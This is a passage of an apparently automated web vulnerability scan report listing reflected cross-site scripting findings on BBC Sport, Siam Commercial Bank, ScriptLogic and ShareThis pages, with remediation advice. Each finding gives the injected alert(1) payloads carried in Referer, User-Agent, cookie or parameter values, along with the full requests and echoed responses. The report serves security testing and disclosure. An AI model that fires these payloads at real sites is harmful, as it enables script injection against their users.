Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26394'-alert(1)-'0dfcb3d66be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=26394'-alert(1)-'0dfcb3d66be

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:16 GMT
Keep-Alive: timeout=10, max=759
Expires: Tue, 03 May 2011 13:25:16 GMT
Connection: close
Set-Cookie: BBC-UID=849dbce0e0f2d3bc0252da7ae12e91005ca16a7f70a072b3675dfa103563ea4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=849dbce0e0f2d3bc0252da7ae12e91005ca16a7f70a072b3675dfa103563ea4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429116000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=26394'-alert(1)-'0dfcb3d66be',
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
       uri: '/sport2/hi/cri
...[SNIP]...

5.163. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5456'-alert(1)-'eedcba2fc56 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e5456'-alert(1)-'eedcba2fc56

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:14 GMT
Keep-Alive: timeout=10, max=780
Expires: Tue, 03 May 2011 13:25:14 GMT
Connection: close
Set-Cookie: BBC-UID=247d3c00d052535acec842cef17c7c929806b9e1b0c0a1a91beb430f1bf4024e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=247d3c00d052535acec842cef17c7c929806b9e1b0c0a1a91beb430f1bf4024e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429114000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e5456'-alert(1)-'eedcba2fc56',
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       uri: '/sport2/hi/footb
...[SNIP]...

5.164. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee9f2'-alert(1)-'dc9780a40d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ee9f2'-alert(1)-'dc9780a40d4

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:16 GMT
Keep-Alive: timeout=10, max=788
Expires: Tue, 03 May 2011 13:25:16 GMT
Connection: close
Set-Cookie: BBC-UID=f4ddbc80e002632ccc5b3c42f1a4726ddb223f88c000112af41b3a94f29c4b1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4ddbc80e002632ccc5b3c42f1a4726ddb223f88c000112af41b3a94f29c4b1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429116000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ee9f2'-alert(1)-'dc9780a40d4',
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

5.165. http://scb.dev-orisma.com/en/friends-of-scb [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://scb.dev-orisma.com
Path:   /en/friends-of-scb

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97d99'-alert(1)-'f49a7c105ce was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/friends-of-scb HTTP/1.1
Host: scb.dev-orisma.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97d99'-alert(1)-'f49a7c105ce
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:18 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=1b6r97hnbodh14c0t6q87djhv5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13488

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>Friends of SCB | The Siam Commercial Bank</title>

<link rel="shortcut icon" href="favicon.ico" type="image/x
...[SNIP]...
LangUrl(){
   return "http://scb.dev-orisma.com/en/";
}
window.onload = function(){
   var clientAgent = window.navigator.userAgent,
       serverAgent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97d99'-alert(1)-'f49a7c105ce';
       
   if( clientAgent!=serverAgent ){
       var target = 'http://' + window.location.host + window.location.pathname;
       if(window.location.search.length>
...[SNIP]...

5.166. http://www.scb.co.th/en/home [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f27bb'-alert(1)-'b41fbf69de4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/home HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Siam+Commercial+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24f27bb'-alert(1)-'b41fbf69de4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:31:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=fmrt1cm1i7mkusih2uucktqj25; path=/
Expires: Wed, 03 Nov 2010 12:31:03 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13989

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...
window.onload = function(){
   var clientAgent = window.navigator.userAgent,
       serverAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24f27bb'-alert(1)-'b41fbf69de4';
   var minLength = (Math.min(clientAgent.length,serverAgent.length) - 5);
   if( clientAgent.substring(0,minLength)!= serverAgent.substring(0,minLength) ){
       var target = 'http://' + window.location.
...[SNIP]...

5.167. http://www.scb.co.th/en/home/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /en/home/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9870'-alert(1)-'0c5ea544d49 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/home/ HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0b9870'-alert(1)-'0c5ea544d49
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/landing.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:33:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=qtib3o2ucdq667jengev8553o0; path=/
Expires: Wed, 03 Nov 2010 12:33:52 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13954

<!doctype html>
<html lang="th" class="no-js">
<head>
<meta charset="UTF-8">
<title>The Siam Commercial Bank : To be the Bank of Choice for our Customers, Shareholders, Empolyee and Community</ti
...[SNIP]...
turn "http://www.scb.co.th/en/";
}
window.onload = function(){
   var clientAgent = window.navigator.userAgent,
       serverAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0b9870'-alert(1)-'0c5ea544d49';
   var minLength = (Math.min(clientAgent.length,serverAgent.length) - 5);
   if( clientAgent.substring(0,minLength)!= serverAgent.substring(0,minLength) ){
       var target = 'http://' + window.location.
...[SNIP]...

5.168. http://dl.scriptlogic.com/download/default.aspx [EntryPoint cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /download/default.aspx

Issue detail

The value of the EntryPoint cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26459"-alert(1)-"55bff08ad4a was submitted in the EntryPoint cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /download/default.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/05070926459"-alert(1)-"55bff08ad4a; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=SX6uWSpAzAEkAAAAMzkxYjQ2NjAtMWZkNC00NDJlLThkZjMtOWM5YmVhNjNmZTgx8Z9iFLO-7KduZ4TQi2DGpW5uh041; expires=Tue, 12-Jul-2011 00:26:32 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=dxa2du45dlubrx3jq2dq3af5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
p%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com"

s.channel = "login"
s.prop1 = "Combined"


s.pageType=""
/* Conversion Variables */
s.campaign="/int/am/prodsel/05070926459"-alert(1)-"55bff08ad4a"

s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
if (typeof slevent != 'undefined')
{
s.events = slevent;
}

if (typeof
...[SNIP]...

5.169. http://dl.scriptlogic.com/login/Combined.aspx [EntryPoint cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/Combined.aspx

Issue detail

The value of the EntryPoint cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fd2"-alert(1)-"05ab401b4d9 was submitted in the EntryPoint cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/Combined.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/05070952fd2"-alert(1)-"05ab401b4d9; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
p%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com"

s.channel = "login"
s.prop1 = "Combined"


s.pageType=""
/* Conversion Variables */
s.campaign="/int/am/prodsel/05070952fd2"-alert(1)-"05ab401b4d9"

s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
if (typeof slevent != 'undefined')
{
s.events = slevent;
}

if (typeof
...[SNIP]...

5.170. http://dl.scriptlogic.com/login/CombinedRegister.aspx [EntryPoint cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/CombinedRegister.aspx

Issue detail

The value of the EntryPoint cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43c81"-alert(1)-"efbc9f64bbc was submitted in the EntryPoint cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/CombinedRegister.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/05070943c81"-alert(1)-"efbc9f64bbc; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
p%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com"

s.channel = "login"
s.prop1 = "Combined"


s.pageType=""
/* Conversion Variables */
s.campaign="/int/am/prodsel/05070943c81"-alert(1)-"efbc9f64bbc"

s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
if (typeof slevent != 'undefined')
{
s.events = slevent;
}

if (typeof
...[SNIP]...

5.171. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload f30c9<script>alert(1)</script>174bae535a7 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&jsref=http%3A%2F%2Fgroup.barclays.com%2FHome&rnd=1304436107086 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==f30c9<script>alert(1)</script>174bae535a7; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 03 May 2011 10:21:51 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==f30c9<script>alert(1)</script>174bae535a7
userid:
</div>
...[SNIP]...

5.172. http://www.scriptlogic.com/downloadmanager/default.aspx [focus parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /downloadmanager/default.aspx

Issue detail

The value of the focus request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aecf'style%3d'x%3aexpr/**/ession(alert(1))'12ed669cb32 was submitted in the focus parameter. This input was echoed as 7aecf'style='x:expr/**/ession(alert(1))'12ed669cb32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /downloadmanager/default.aspx?focus=1087aecf'style%3d'x%3aexpr/**/ession(alert(1))'12ed669cb32 HTTP/1.1
Host: www.scriptlogic.com
